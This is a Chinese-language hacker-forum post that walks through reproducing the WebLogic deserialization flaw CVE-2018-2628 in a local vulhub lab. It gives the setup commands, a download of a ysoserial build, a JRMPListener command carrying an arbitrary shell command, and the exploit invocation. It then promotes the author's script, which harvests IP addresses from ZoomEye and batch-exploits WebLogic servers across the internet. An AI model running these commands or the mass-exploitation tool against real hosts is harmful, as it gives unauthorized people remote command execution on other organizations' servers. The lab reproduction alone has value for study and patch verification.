Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

复现CVE-2018-2628的反序列化漏洞

 Share


Recommended Posts

首先去vulhub下好对应的项目,进入对应的文件夹,执行:

docker-compose up -d
  • 1

搭建好环境后,访问:127.0.0.1:7001
出现以下:

ksQKVH.png
ksQKVH.png

漏洞介绍

Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

漏洞复现
下载对应的利用工具:

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
copy里面的利用代码https://www.exploit-db.com/exploits/44553
  • 1
  • 2

利用:
启动一个JRMP Server:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

listen port=监听的端口
command=你要执行的命令

例子:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1001 CommonsCollections1 'touch /haq520'
kstj2j.png
kstj2j.png

发送exploit


python exp.py 127.0.0.1 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 127.0.0.1 1099 JRMPClient

 

ksNMdK.md.png

结果:

ksNaeP.png
ksNaeP.png

实战
上面说了欠慕慕一个脚本,这里下午写完。放入了仓库
python/weblogic反序列化批量利用 at master · 422926799/python · GitHub

说明:
weblogic反序列化批量利用,可通过网页关键字判断是否weblogic服务,批量检测或单个检测,判断7001端口是否开放,可从zoomeye抓取IP,请自行配置config文件夹里面的search.ini,填写zoomeye的user和pwd。

测试结果:

ksNszj.png
ksNszj.png
ksNTSJ.png
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...